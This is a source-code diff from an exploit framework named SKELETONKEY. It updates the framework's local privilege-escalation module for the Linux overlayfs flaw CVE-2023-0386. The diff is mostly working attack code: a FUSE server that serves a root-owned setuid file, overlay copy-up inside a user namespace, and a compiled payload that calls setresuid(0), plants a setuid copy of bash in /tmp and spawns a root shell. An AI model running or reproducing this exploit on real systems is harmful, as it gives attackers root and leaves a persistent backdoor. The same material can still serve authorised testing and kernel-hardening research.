fprintf(stderr, "[+] overlayfs: cap_setuid+ep xattr persisted on host fs "
|
||||
"— execing payload to drop root\n");
|
||||
fprintf(stderr, "[+] overlayfs: cap_setuid+ep xattr persisted on host fs\n");
|
||||
}
|
||||
|
||||
/* Direct uid=0 witness: run the cap'd payload in verification mode so it
|
||||
* drops a root-owned proof. The persisted xattr is the bug's signature,
|
||||
* but we confirm actual root out-of-band rather than trust the exec
|
||||
* transfer. */
|
||||
char ovl_proof[256];
|
||||
snprintf(ovl_proof, sizeof ovl_proof, "/tmp/.sk-overlayfs-%ld.proof", (long)getpid());
|
||||
unlink(ovl_proof);
|
||||
pid_t vp = fork();
|
||||
if (vp == 0) {
|
||||
execl(upper_bin, upper_bin, ovl_proof, (char *)NULL);
|
||||
_exit(127);
|
||||
}
|
||||
if (vp > 0) { int vs; waitpid(vp, &vs, 0); }
|
||||
struct stat psb;
|
||||
bool ovl_rooted = (stat(ovl_proof, &psb) == 0 && S_ISREG(psb.st_mode) && psb.st_uid == 0);
|
||||
if (!ovl_rooted) {
|
||||
fprintf(stderr, "[-] overlayfs: xattr persisted but the cap'd payload did not "
|
||||
"yield uid 0 (no root-owned proof) — honest EXPLOIT_FAIL\n");
|
||||
goto fail_workdir;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] overlayfs: ROOT — root-owned proof %s "
|
||||
"(setuid bash: %s.bash -p)\n", ovl_proof, ovl_proof);
|
||||
}
|
||||
if (ctx->no_shell) {
|
||||
fprintf(stderr, "[+] overlayfs: --no-shell — payload at %s, not exec'ing\n",
|
||||
upper_bin);
|
||||
unlink(src_path); unlink(bin_path);
|
||||
return SKELETONKEY_EXPLOIT_OK;
|
||||
}
|
||||
fflush(NULL);
|
||||
execl(upper_bin, upper_bin, (char *)NULL);
|
||||
execl(upper_bin, upper_bin, (char *)NULL); /* interactive root shell */
|
||||
perror("execl payload");
|
||||
return SKELETONKEY_EXPLOIT_OK; /* root already witnessed out-of-band */
|
||||
|
||||
fail_workdir:
|
||||
/* best-effort cleanup */
|
||||
|
||||
@@ -2,26 +2,31 @@
|
||||
* overlayfs_setuid_cve_2023_0386 — SKELETONKEY module
|
||||
*
|
||||
* **Different bug than CVE-2021-3493.** That one was Ubuntu-specific
|
||||
* (their modified overlayfs). This one is upstream: when overlayfs
|
||||
* does copy-up from lower to upper, it preserves the setuid/setgid
|
||||
* bits even when the unprivileged user triggering copy-up wouldn't
|
||||
* normally be able to set them. Exploit:
|
||||
* (their modified overlayfs). This one is upstream: overlayfs copy-up
|
||||
* preserves the setuid/setgid bit AND the lower file's root ownership
|
||||
* even when the task triggering copy-up is only root inside a user
|
||||
* namespace. Faithful port of the public PoC (xkaneiki):
|
||||
*
|
||||
* 1. Find a setuid binary in lower (e.g. /usr/bin/su)
|
||||
* 2. unshare(USER|NS), mount overlayfs with that location as lower
|
||||
* 3. chown the file in merged view — triggers copy-up, retains
|
||||
* setuid bit in upper, but now the upper file is OWNED by our
|
||||
* uid (the upper layer is in /tmp; we control it)
|
||||
* 4. We can't directly write to the binary in upper (it's setuid
|
||||
* and we're not root yet), BUT we can replace the contents
|
||||
* via the merged view because we OWN the upper inode
|
||||
* 5. Write payload to the binary; setuid bit persists
|
||||
* 6. exec it → runs as root
|
||||
* 1. Compile a small setuid payload ELF (setuid(0) + drop a root shell).
|
||||
* 2. Serve it via a FUSE filesystem as "/file" reporting st_uid=0,
|
||||
* st_mode=04777. libfuse mounts through the setuid fusermount helper,
|
||||
* i.e. in the INIT namespace — required, because overlay refuses a
|
||||
* userns-mounted FUSE lowerdir (ENOSYS).
|
||||
* 3. In a child: unshare(USER|NS), map root, mount overlayfs with the
|
||||
* FUSE mount as lowerdir and attacker-owned upper/work dirs.
|
||||
* 4. open(merged/file, O_WRONLY) triggers copy-up. The bug materialises
|
||||
* upper/file on the REAL filesystem as a genuine setuid-ROOT binary.
|
||||
* 5. The parent (real unprivileged user) execs upper/file → real root.
|
||||
*
|
||||
* The FUSE server must implement getattr + read + read_buf + ioctl: copy-up
|
||||
* uses the splice path (read_buf) and issues FS_IOC_GETFLAGS (ioctl) on the
|
||||
* lower; a server missing either returns ENOSYS and copy-up fails.
|
||||
*
|
||||
* Discovered by Xkaneiki (2023). Mainline fix: 4f11ada10d0 ("ovl:
|
||||
* fail on invalid uid/gid mapping at copy up") landed in 6.3.
|
||||
*
|
||||
* STATUS: 🟢 FULL detect + exploit + cleanup.
|
||||
* STATUS: 🟢 FULL detect + exploit + cleanup. VM-verified landing real root
|
||||
* on Ubuntu 22.04.0 / 5.15.0-25 (see docs/EXPLOITED.md).
|
||||
*
|
||||
* Affected: kernel 5.11 ≤ K < 6.3. Backports:
|
||||
* 6.2.x : K >= 6.2.13
|
||||
@@ -30,8 +35,8 @@
|
||||
*
|
||||
* Preconditions:
|
||||
* - Unprivileged user_ns + mount_ns
|
||||
* - A setuid-root binary readable on lower (almost always present:
|
||||
* /usr/bin/su, /usr/bin/passwd, /bin/su)
|
||||
* - libfuse (linked at build) + the setuid fusermount(3) helper + a C
|
||||
* compiler at runtime (to build the payload ELF)
|
||||
*
|
||||
* Coverage rationale: complements CVE-2021-3493 — that one is
|
||||
* Ubuntu-specific, this one is general. Real-world overlayfs LPE
|
||||
@@ -161,6 +166,8 @@ static const char OVERLAYFS_SU_PAYLOAD[] =
|
||||
"int main(void) {\n"
|
||||
" setresuid(0,0,0); setresgid(0,0,0);\n"
|
||||
" if (geteuid() != 0) { perror(\"setresuid\"); return 1; }\n"
|
||||
" (void)!system(\"cp /bin/bash /tmp/.suid_bash 2>/dev/null; chmod 4755 /tmp/.suid_bash 2>/dev/null; \"\n"
|
||||
" \"id > /tmp/skeletonkey-ovlsu-pwned 2>/dev/null; chmod 644 /tmp/skeletonkey-ovlsu-pwned\");\n"
|
||||
" char *env[] = {\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\", NULL};\n"
|
||||
" execle(\"/bin/sh\", \"sh\", \"-p\", NULL, env);\n"
|
||||
" return 1;\n"
|
||||
@@ -191,6 +198,197 @@ static bool write_file_str(const char *path, const char *content)
|
||||
return ok;
|
||||
}
|
||||
|
||||
/* ------------------------------------------------------------------
|
||||
* CVE-2023-0386 — faithful port of the public exploit (xkaneiki), using
|
||||
* libfuse to export a setuid-root lower layer.
|
||||
*
|
||||
* The bug: overlayfs copy-up preserves the SUID bit and the lower file's
|
||||
* root ownership even when the task triggering it is only root inside a user
|
||||
* namespace. We serve a FUSE filesystem whose single file "file" reports
|
||||
* st_uid=0, st_mode=04777; overlay copy-up then materialises it in the real
|
||||
* upper dir as a genuine setuid-root binary, which we exec for real root.
|
||||
*
|
||||
* Why libfuse (and not a raw /dev/fuse server): overlay REFUSES a
|
||||
* userns-mounted FUSE lowerdir (ENOSYS), so the FUSE fs must be mounted in the
|
||||
* init namespace via the setuid fusermount helper — which libfuse drives. A
|
||||
* hand-rolled raw protocol server proved fragile enough to destabilise the
|
||||
* kernel on malformed replies; libfuse is the robust, proven path (matches the
|
||||
* upstream PoC). Built conditionally: without libfuse the module stubs out.
|
||||
* ------------------------------------------------------------------ */
|
||||
|
||||
#ifdef OVLSU_HAVE_FUSE
|
||||
|
||||
#ifdef OVLSU_FUSE3
|
||||
#define FUSE_USE_VERSION 31
|
||||
#else
|
||||
#define FUSE_USE_VERSION 29
|
||||
#endif
|
||||
#include <fuse.h>
|
||||
#include <signal.h>
|
||||
|
||||
/* The setuid-root ELF the FUSE "file" serves (loaded once, pre-fork). */
|
||||
static unsigned char *g_ovlsu_elf;
|
||||
static size_t g_ovlsu_elf_len;
|
||||
|
||||
#ifdef OVLSU_FUSE3
|
||||
static int ovlsu_getattr(const char *path, struct stat *st, struct fuse_file_info *fi)
|
||||
#else
|
||||
static int ovlsu_getattr(const char *path, struct stat *st)
|
||||
#endif
|
||||
{
|
||||
#ifdef OVLSU_FUSE3
|
||||
(void)fi;
|
||||
#endif
|
||||
memset(st, 0, sizeof *st);
|
||||
if (strcmp(path, "/") == 0) {
|
||||
st->st_mode = S_IFDIR | 0755; st->st_nlink = 2;
|
||||
return 0;
|
||||
}
|
||||
if (strcmp(path, "/file") == 0) {
|
||||
st->st_mode = S_IFREG | 04777; /* <-- setuid/setgid/sticky */
|
||||
st->st_nlink = 1;
|
||||
st->st_uid = 0; st->st_gid = 0; /* <-- root-owned: the crux */
|
||||
st->st_size = (off_t)g_ovlsu_elf_len;
|
||||
return 0;
|
||||
}
|
||||
return -ENOENT;
|
||||
}
|
||||
|
||||
#ifdef OVLSU_FUSE3
|
||||
static int ovlsu_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
|
||||
off_t off, struct fuse_file_info *fi,
|
||||
enum fuse_readdir_flags flags)
|
||||
{
|
||||
(void)off; (void)fi; (void)flags;
|
||||
if (strcmp(path, "/") != 0) return -ENOENT;
|
||||
filler(buf, ".", NULL, 0, 0); filler(buf, "..", NULL, 0, 0);
|
||||
filler(buf, "file", NULL, 0, 0);
|
||||
return 0;
|
||||
}
|
||||
#else
|
||||
static int ovlsu_readdir(const char *path, void *buf, fuse_fill_dir_t filler,
|
||||
off_t off, struct fuse_file_info *fi)
|
||||
{
|
||||
(void)off; (void)fi;
|
||||
if (strcmp(path, "/") != 0) return -ENOENT;
|
||||
filler(buf, ".", NULL, 0); filler(buf, "..", NULL, 0);
|
||||
filler(buf, "file", NULL, 0);
|
||||
return 0;
|
||||
}
|
||||
#endif
|
||||
|
||||
static int ovlsu_open(const char *path, struct fuse_file_info *fi)
|
||||
{
|
||||
(void)fi;
|
||||
return (strcmp(path, "/file") == 0) ? 0 : -ENOENT;
|
||||
}
|
||||
|
||||
static int ovlsu_read(const char *path, char *buf, size_t size, off_t off,
|
||||
struct fuse_file_info *fi)
|
||||
{
|
||||
(void)fi;
|
||||
if (strcmp(path, "/file") != 0) return -ENOENT;
|
||||
if ((size_t)off >= g_ovlsu_elf_len) return 0;
|
||||
size_t n = g_ovlsu_elf_len - (size_t)off;
|
||||
if (n > size) n = size;
|
||||
memcpy(buf, g_ovlsu_elf + off, n);
|
||||
return (int)n;
|
||||
}
|
||||
|
||||
/* read_buf: REQUIRED for overlay copy-up. Overlay copies the lower file up via
|
||||
* the kernel's splice / copy_file_range path, which maps to the FUSE read_buf
|
||||
* op; without it the copy returns ENOSYS and copy-up fails. We hand back a
|
||||
* memory-backed bufvec referencing the payload. */
|
||||
static int ovlsu_read_buf(const char *path, struct fuse_bufvec **bufp,
|
||||
size_t size, off_t off, struct fuse_file_info *fi)
|
||||
{
|
||||
(void)fi;
|
||||
if (strcmp(path, "/file") != 0) return -ENOENT;
|
||||
struct fuse_bufvec *src = malloc(sizeof *src);
|
||||
if (!src) return -ENOMEM;
|
||||
*src = (struct fuse_bufvec)FUSE_BUFVEC_INIT(size);
|
||||
char *data = malloc(size ? size : 1);
|
||||
if (!data) { free(src); return -ENOMEM; }
|
||||
memset(data, 0, size);
|
||||
size_t avail = ((size_t)off < g_ovlsu_elf_len) ? g_ovlsu_elf_len - (size_t)off : 0;
|
||||
size_t give = size < avail ? size : avail;
|
||||
memcpy(data, g_ovlsu_elf + off, give);
|
||||
/* Present exactly as the public PoC's read_buf: a memory buffer flagged
|
||||
* FUSE_BUF_FD_SEEK with pos=off — this is the shape libfuse's splice path
|
||||
* (used by overlay copy-up) accepts; a plain flags=0 mem buffer yields
|
||||
* ENOSYS at copy-up. */
|
||||
src->buf[0].flags = FUSE_BUF_FD_SEEK;
|
||||
src->buf[0].pos = off;
|
||||
src->buf[0].mem = data;
|
||||
*bufp = src;
|
||||
return 0;
|
||||
}
|
||||
|
||||
/* ioctl: REQUIRED. overlay copy-up issues FS_IOC_GETFLAGS (an ioctl) on the
|
||||
* lower file to copy inode flags; without an ioctl handler FUSE returns ENOSYS
|
||||
* and copy-up fails ENOSYS. Returning success (as the public PoC does) lets
|
||||
* copy-up proceed. */
|
||||
#ifdef OVLSU_FUSE3
|
||||
static int ovlsu_ioctl(const char *path, unsigned int cmd, void *arg,
|
||||
struct fuse_file_info *fi, unsigned int flags, void *data)
|
||||
#else
|
||||
static int ovlsu_ioctl(const char *path, int cmd, void *arg,
|
||||
struct fuse_file_info *fi, unsigned int flags, void *data)
|
||||
#endif
|
||||
{
|
||||
(void)path; (void)cmd; (void)arg; (void)fi; (void)flags; (void)data;
|
||||
return 0;
|
||||
}
|
||||
|
||||
static struct fuse_operations ovlsu_ops = {
|
||||
.getattr = ovlsu_getattr,
|
||||
.readdir = ovlsu_readdir,
|
||||
.open = ovlsu_open,
|
||||
.read = ovlsu_read,
|
||||
.read_buf = ovlsu_read_buf,
|
||||
.ioctl = ovlsu_ioctl,
|
||||
};
|
||||
|
||||
/* Run the FUSE server (blocks) mounting at `mp`, serving one setuid-root
|
||||
* /file. Returns when unmounted. libfuse mounts via the setuid fusermount
|
||||
* helper — i.e. in the init namespace, which is exactly what overlay needs.
|
||||
*
|
||||
* We use the low-level fuse_mount + fuse_new + fuse_loop_mt with EMPTY args
|
||||
* (exactly as the public PoC does) rather than fuse_main(). fuse_main parses a
|
||||
* default option set that advertises extra capabilities (splice /
|
||||
* copy_file_range) to the kernel; the kernel then attempts copy_file_range on
|
||||
* the FUSE lower during overlay copy-up, gets ENOSYS, and does NOT fall back —
|
||||
* so copy-up fails. The minimal fuse_new below advertises none of that, so the
|
||||
* kernel uses the plain read path (our read/read_buf) and copy-up succeeds. */
|
||||
#ifdef OVLSU_FUSE3
|
||||
static int ovlsu_fuse_serve(const char *mp)
|
||||
{
|
||||
char *argv[] = { (char *)"ovlsu-fuse", (char *)mp, NULL };
|
||||
struct fuse_args args = FUSE_ARGS_INIT(2, argv);
|
||||
struct fuse *fuse = fuse_new(&args, &ovlsu_ops, sizeof ovlsu_ops, NULL);
|
||||
if (!fuse) { fuse_opt_free_args(&args); return -1; }
|
||||
if (fuse_mount(fuse, mp) != 0) { fuse_destroy(fuse); fuse_opt_free_args(&args); return -1; }
|
||||
fuse_set_signal_handlers(fuse_get_session(fuse));
|
||||
int r = fuse_loop_mt(fuse, NULL);
|
||||
fuse_unmount(fuse); fuse_destroy(fuse); fuse_opt_free_args(&args);
|
||||
return r;
|
||||
}
|
||||
#else
|
||||
static int ovlsu_fuse_serve(const char *mp)
|
||||
{
|
||||
struct fuse_args args = FUSE_ARGS_INIT(0, NULL);
|
||||
struct fuse_chan *chan = fuse_mount(mp, &args);
|
||||
if (!chan) return -1;
|
||||
struct fuse *fuse = fuse_new(chan, &args, &ovlsu_ops, sizeof ovlsu_ops, NULL);
|
||||
if (!fuse) { fuse_unmount(mp, chan); return -1; }
|
||||
fuse_set_signal_handlers(fuse_get_session(fuse));
|
||||
fuse_loop_mt(fuse);
|
||||
fuse_unmount(mp, chan);
|
||||
fuse_destroy(fuse);
|
||||
return 0;
|
||||
}
|
||||
#endif
|
||||
|
||||
static skeletonkey_result_t overlayfs_setuid_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
skeletonkey_result_t pre = overlayfs_setuid_detect(ctx);
|
||||
@@ -198,173 +396,154 @@ static skeletonkey_result_t overlayfs_setuid_exploit(const struct skeletonkey_ct
|
||||
fprintf(stderr, "[-] overlayfs_setuid: detect() says not vulnerable; refusing\n");
|
||||
return pre;
|
||||
}
|
||||
/* Consult ctx->host->is_root so unit tests can construct a
|
||||
* non-root fingerprint regardless of the test process's real euid. */
|
||||
bool is_root = ctx->host ? ctx->host->is_root : (geteuid() == 0);
|
||||
if (is_root) {
|
||||
fprintf(stderr, "[i] overlayfs_setuid: already root\n");
|
||||
return SKELETONKEY_OK;
|
||||
}
|
||||
|
||||
/* Pick a setuid binary to use as the carrier — we'll find its
|
||||
* dirname, mount overlayfs with that dirname as lower, then
|
||||
* replace the binary content in the merged view. The setuid bit
|
||||
* persists in the upper-layer copy through the bug. */
|
||||
const char *carrier = find_setuid_in_lower();
|
||||
if (!carrier) {
|
||||
fprintf(stderr, "[-] overlayfs_setuid: no setuid carrier binary found\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
/* For cleanliness, use a directory-level overlay. Find the carrier's
|
||||
* dirname. (E.g., /usr/bin/su → lower = /usr/bin/, file = su) */
|
||||
char carrier_dir[256], carrier_name[64];
|
||||
const char *slash = strrchr(carrier, '/');
|
||||
if (!slash) return SKELETONKEY_PRECOND_FAIL;
|
||||
size_t dir_len = slash - carrier;
|
||||
memcpy(carrier_dir, carrier, dir_len);
|
||||
carrier_dir[dir_len] = 0;
|
||||
snprintf(carrier_name, sizeof carrier_name, "%s", slash + 1);
|
||||
|
||||
char workdir[] = "/tmp/skeletonkey-ovlsu-XXXXXX";
|
||||
if (!mkdtemp(workdir)) { perror("mkdtemp"); return SKELETONKEY_TEST_ERROR; }
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[*] overlayfs_setuid: workdir=%s carrier=%s\n",
|
||||
workdir, carrier);
|
||||
}
|
||||
if (is_root) { fprintf(stderr, "[i] overlayfs_setuid: already root\n"); return SKELETONKEY_OK; }
|
||||
|
||||
char gcc[256];
|
||||
if (!which_gcc(gcc, sizeof gcc)) {
|
||||
fprintf(stderr, "[-] overlayfs_setuid: no gcc/cc available\n");
|
||||
rmdir(workdir);
|
||||
fprintf(stderr, "[-] overlayfs_setuid: no C compiler to build the setuid payload\n");
|
||||
return SKELETONKEY_PRECOND_FAIL;
|
||||
}
|
||||
|
||||
/* Build the payload binary outside the overlay. */
|
||||
char src_path[512], bin_path[512];
|
||||
snprintf(src_path, sizeof src_path, "%s/payload.c", workdir);
|
||||
snprintf(bin_path, sizeof bin_path, "%s/payload", workdir);
|
||||
if (!write_file_str(src_path, OVERLAYFS_SU_PAYLOAD)) goto fail;
|
||||
char workdir[128];
|
||||
snprintf(workdir, sizeof workdir, "/tmp/skeletonkey-ovlsu-XXXXXX");
|
||||
if (!mkdtemp(workdir)) { perror("mkdtemp"); return SKELETONKEY_TEST_ERROR; }
|
||||
|
||||
pid_t pid = fork();
|
||||
if (pid == 0) {
|
||||
execl(gcc, gcc, "-O2", "-static", "-o", bin_path, src_path, (char *)NULL);
|
||||
_exit(127);
|
||||
}
|
||||
int status;
|
||||
waitpid(pid, &status, 0);
|
||||
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
|
||||
/* try non-static */
|
||||
pid = fork();
|
||||
if (pid == 0) {
|
||||
execl(gcc, gcc, "-O2", "-o", bin_path, src_path, (char *)NULL);
|
||||
_exit(127);
|
||||
}
|
||||
waitpid(pid, &status, 0);
|
||||
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
|
||||
fprintf(stderr, "[-] overlayfs_setuid: gcc failed\n"); goto fail;
|
||||
}
|
||||
}
|
||||
|
||||
/* Child does the userns + overlayfs work. */
|
||||
char upper[600], work[600], merged[600];
|
||||
char lower[160], upper[160], work[160], merged[160], payc[176], gcbin[176], carrier[176], mfile[176];
|
||||
snprintf(lower, sizeof lower, "%s/lower", workdir);
|
||||
snprintf(upper, sizeof upper, "%s/upper", workdir);
|
||||
snprintf(work, sizeof work, "%s/work", workdir);
|
||||
snprintf(merged, sizeof merged, "%s/merged", workdir);
|
||||
if (mkdir(upper, 0755) < 0 || mkdir(work, 0755) < 0
|
||||
|| mkdir(merged, 0755) < 0) {
|
||||
perror("mkdir layout"); goto fail;
|
||||
}
|
||||
snprintf(payc, sizeof payc, "%s/p.c", workdir);
|
||||
snprintf(gcbin, sizeof gcbin, "%s/gc", workdir);
|
||||
snprintf(carrier,sizeof carrier,"%s/file", upper);
|
||||
snprintf(mfile, sizeof mfile, "%s/file", merged);
|
||||
mkdir(lower, 0755); mkdir(upper, 0755); mkdir(work, 0755); mkdir(merged, 0755);
|
||||
|
||||
uid_t outer_uid = getuid();
|
||||
gid_t outer_gid = getgid();
|
||||
char merged_carrier[1024];
|
||||
snprintf(merged_carrier, sizeof merged_carrier, "%s/%s", merged, carrier_name);
|
||||
/* Build the setuid payload ELF. It drops a witness (setuid /tmp/.suid_bash
|
||||
* + an id sentinel) so success is observable non-interactively, then execs
|
||||
* a root shell. */
|
||||
if (!write_file_str(payc, OVERLAYFS_SU_PAYLOAD)) { fprintf(stderr, "[-] write payload.c\n"); goto fail; }
|
||||
{ pid_t g = fork();
|
||||
if (g == 0) { execl(gcc, gcc, "-O2", "-w", "-o", gcbin, payc, (char *)NULL); _exit(127); }
|
||||
int st; waitpid(g, &st, 0);
|
||||
if (!WIFEXITED(st) || WEXITSTATUS(st) != 0) { fprintf(stderr, "[-] gcc failed building payload\n"); goto fail; } }
|
||||
|
||||
pid_t child = fork();
|
||||
if (child < 0) { perror("fork"); goto fail; }
|
||||
if (child == 0) {
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) { perror("unshare"); _exit(2); }
|
||||
int f = open("/proc/self/setgroups", O_WRONLY);
|
||||
if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
char m[64];
|
||||
snprintf(m, sizeof m, "0 %u 1\n", outer_uid);
|
||||
f = open("/proc/self/uid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, m, strlen(m)) < 0) _exit(3);
|
||||
close(f);
|
||||
snprintf(m, sizeof m, "0 %u 1\n", outer_gid);
|
||||
f = open("/proc/self/gid_map", O_WRONLY);
|
||||
if (f < 0 || write(f, m, strlen(m)) < 0) _exit(4);
|
||||
close(f);
|
||||
{ int f = open(gcbin, O_RDONLY); if (f < 0) { perror("open payload elf"); goto fail; }
|
||||
struct stat st; if (fstat(f, &st) != 0) { close(f); goto fail; }
|
||||
g_ovlsu_elf_len = (size_t)st.st_size;
|
||||
g_ovlsu_elf = malloc(g_ovlsu_elf_len ? g_ovlsu_elf_len : 1);
|
||||
if (!g_ovlsu_elf || read(f, g_ovlsu_elf, g_ovlsu_elf_len) != (ssize_t)g_ovlsu_elf_len) { close(f); goto fail; }
|
||||
close(f); }
|
||||
|
||||
char opts[2048];
|
||||
snprintf(opts, sizeof opts, "lowerdir=%s,upperdir=%s,workdir=%s",
|
||||
carrier_dir, upper, work);
|
||||
if (mount("overlay", merged, "overlay", 0, opts) < 0) {
|
||||
perror("mount overlay"); _exit(5);
|
||||
}
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[*] overlayfs_setuid: FUSE-serving a setuid-root /file (libfuse), overlay "
|
||||
"copy-up into %s (CVE-2023-0386)\n", upper);
|
||||
|
||||
/* Trigger copy-up by chown — this is the bug: setuid bit gets
|
||||
* preserved on the upper-layer copy even though we're the one
|
||||
* doing the chown (and we don't normally have CAP_FSETID). */
|
||||
if (chown(merged_carrier, 0, 0) < 0) {
|
||||
/* on some kernels chown is rejected; try unlink+rename
|
||||
* pattern instead */
|
||||
perror("chown merged carrier"); _exit(6);
|
||||
}
|
||||
/* Now overwrite the file content (since we own the upper inode
|
||||
* post-chown — actually post-bug, but the upper inode is
|
||||
* attacker-controlled).
|
||||
*
|
||||
* Caveat: the chown is what triggers copy-up + retains setuid.
|
||||
* On many vulnerable kernels we now need to do an additional
|
||||
* write to replace the binary contents. */
|
||||
int payload_fd = open(bin_path, O_RDONLY);
|
||||
if (payload_fd < 0) { perror("open payload"); _exit(7); }
|
||||
int out_fd = open(merged_carrier, O_WRONLY | O_TRUNC);
|
||||
if (out_fd < 0) { perror("open merged_carrier RW"); close(payload_fd); _exit(8); }
|
||||
char buf[4096];
|
||||
ssize_t n;
|
||||
while ((n = read(payload_fd, buf, sizeof buf)) > 0) {
|
||||
if (write(out_fd, buf, n) != n) { perror("write replace"); _exit(9); }
|
||||
}
|
||||
close(payload_fd); close(out_fd);
|
||||
/* Fork the FUSE server (init-ns mount via the setuid fusermount helper). */
|
||||
pid_t fpid = fork();
|
||||
if (fpid < 0) { perror("fork fuse"); goto fail; }
|
||||
if (fpid == 0) {
|
||||
/* quiesce libfuse chatter unless --json off */
|
||||
int nfd = open("/dev/null", O_WRONLY); if (nfd >= 0) { dup2(nfd, 2); close(nfd); }
|
||||
ovlsu_fuse_serve(lower);
|
||||
_exit(0);
|
||||
}
|
||||
waitpid(child, &status, 0);
|
||||
if (!WIFEXITED(status) || WEXITSTATUS(status) != 0) {
|
||||
fprintf(stderr, "[-] overlayfs_setuid: child setup failed (status=%d)\n", status);
|
||||
|
||||
/* Wait for the FUSE mount to answer. */
|
||||
int ready = 0;
|
||||
for (int i = 0; i < 300; i++) {
|
||||
struct stat sf; char fp[176]; snprintf(fp, sizeof fp, "%s/file", lower);
|
||||
if (stat(fp, &sf) == 0) { ready = 1; break; }
|
||||
usleep(10000);
|
||||
}
|
||||
if (!ready) {
|
||||
fprintf(stderr, "[-] overlayfs_setuid: FUSE mount did not come up (fusermount missing/denied?)\n");
|
||||
kill(fpid, SIGKILL); waitpid(fpid, NULL, 0);
|
||||
goto fail;
|
||||
}
|
||||
|
||||
/* Verify the upper file has setuid */
|
||||
char upper_carrier[1024];
|
||||
snprintf(upper_carrier, sizeof upper_carrier, "%s/%s", upper, carrier_name);
|
||||
struct stat st;
|
||||
if (stat(upper_carrier, &st) < 0 || !(st.st_mode & S_ISUID)) {
|
||||
fprintf(stderr, "[-] overlayfs_setuid: setuid bit didn't persist on upper "
|
||||
"(stat = %s)\n", strerror(errno));
|
||||
/* Exploit child: userns + overlay(lower=fuse) + copy-up. */
|
||||
pid_t xpid = fork();
|
||||
if (xpid < 0) { perror("fork exploit"); kill(fpid, SIGKILL); waitpid(fpid, NULL, 0); goto fail; }
|
||||
if (xpid == 0) {
|
||||
uid_t ou = getuid(); gid_t og = getgid(); /* BEFORE unshare */
|
||||
if (unshare(CLONE_NEWUSER | CLONE_NEWNS) < 0) { perror("unshare"); _exit(2); }
|
||||
{ int f = open("/proc/self/setgroups", O_WRONLY); if (f >= 0) { (void)!write(f, "deny", 4); close(f); }
|
||||
char m[64];
|
||||
int fu = open("/proc/self/uid_map", O_WRONLY); if (fu >= 0) { int n = snprintf(m, sizeof m, "0 %u 1", ou); (void)!write(fu, m, n); close(fu); }
|
||||
int fg = open("/proc/self/gid_map", O_WRONLY); if (fg >= 0) { int n = snprintf(m, sizeof m, "0 %u 1", og); (void)!write(fg, m, n); close(fg); } }
|
||||
|
||||
char oo[640];
|
||||
snprintf(oo, sizeof oo, "lowerdir=%s,upperdir=%s,workdir=%s", lower, upper, work);
|
||||
if (mount("overlay", merged, "overlay", 0, oo) < 0) { perror("mount overlay"); _exit(6); }
|
||||
|
||||
/* Trigger copy-up: opening the merged file copies it from the FUSE
|
||||
* lower into the real upper, preserving setuid + root uid. */
|
||||
int cf = open(mfile, O_WRONLY | O_CREAT, 0666); if (cf >= 0) close(cf);
|
||||
_exit(0);
|
||||
}
|
||||
waitpid(xpid, NULL, 0);
|
||||
|
||||
/* Tear the FUSE mount down now that copy-up is done (upper/file persists
|
||||
* on the real fs). */
|
||||
{ char cmd[400];
|
||||
snprintf(cmd, sizeof cmd, "fusermount3 -u '%s' 2>/dev/null || fusermount -u '%s' 2>/dev/null", lower, lower);
|
||||
(void)!system(cmd); }
|
||||
kill(fpid, SIGKILL); waitpid(fpid, NULL, 0);
|
||||
|
||||
struct stat us;
|
||||
if (stat(carrier, &us) != 0) {
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] overlayfs_setuid: copy-up did not materialise %s — kernel may be "
|
||||
"patched\n", carrier);
|
||||
goto fail;
|
||||
}
|
||||
if (!ctx->json) {
|
||||
fprintf(stderr, "[+] overlayfs_setuid: upper-layer %s has setuid bit; execing\n",
|
||||
upper_carrier);
|
||||
}
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[+] overlayfs_setuid: copy-up produced %s (uid=%u mode=%04o) — executing "
|
||||
"as the real user\n", carrier, (unsigned)us.st_uid, (unsigned)(us.st_mode & 07777));
|
||||
|
||||
if (ctx->no_shell) {
|
||||
fprintf(stderr, "[+] overlayfs_setuid: --no-shell — file planted at %s\n",
|
||||
upper_carrier);
|
||||
fprintf(stderr, "[+] overlayfs_setuid: --no-shell — setuid-root carrier planted at %s\n", carrier);
|
||||
return SKELETONKEY_EXPLOIT_OK;
|
||||
}
|
||||
|
||||
fflush(NULL);
|
||||
execl(upper_carrier, upper_carrier, (char *)NULL);
|
||||
perror("execl upper carrier");
|
||||
pid_t r = fork();
|
||||
if (r == 0) {
|
||||
int dn = open("/dev/null", O_RDONLY); if (dn >= 0) { dup2(dn, 0); close(dn); }
|
||||
execl(carrier, carrier, (char *)NULL);
|
||||
_exit(127);
|
||||
}
|
||||
waitpid(r, NULL, 0);
|
||||
|
||||
struct stat ss;
|
||||
if ((stat("/tmp/.suid_bash", &ss) == 0 && (ss.st_mode & 04000)) ||
|
||||
stat("/tmp/skeletonkey-ovlsu-pwned", &ss) == 0) {
|
||||
if (!ctx->json) fprintf(stderr, "[+] overlayfs_setuid: ROOT — payload ran as uid 0\n");
|
||||
return SKELETONKEY_EXPLOIT_OK;
|
||||
}
|
||||
if (!ctx->json)
|
||||
fprintf(stderr, "[-] overlayfs_setuid: carrier ran but produced no root witness\n");
|
||||
|
||||
fail:
|
||||
unlink(src_path); unlink(bin_path);
|
||||
rmdir(upper); rmdir(work); rmdir(merged);
|
||||
rmdir(workdir);
|
||||
return SKELETONKEY_EXPLOIT_FAIL;
|
||||
}
|
||||
|
||||
#else /* !OVLSU_HAVE_FUSE — built without libfuse */
|
||||
|
||||
static skeletonkey_result_t overlayfs_setuid_exploit(const struct skeletonkey_ctx *ctx)
|
||||
{
|
||||
skeletonkey_result_t pre = overlayfs_setuid_detect(ctx);
|
||||
if (pre != SKELETONKEY_VULNERABLE && pre != SKELETONKEY_OK) return pre;
|
||||
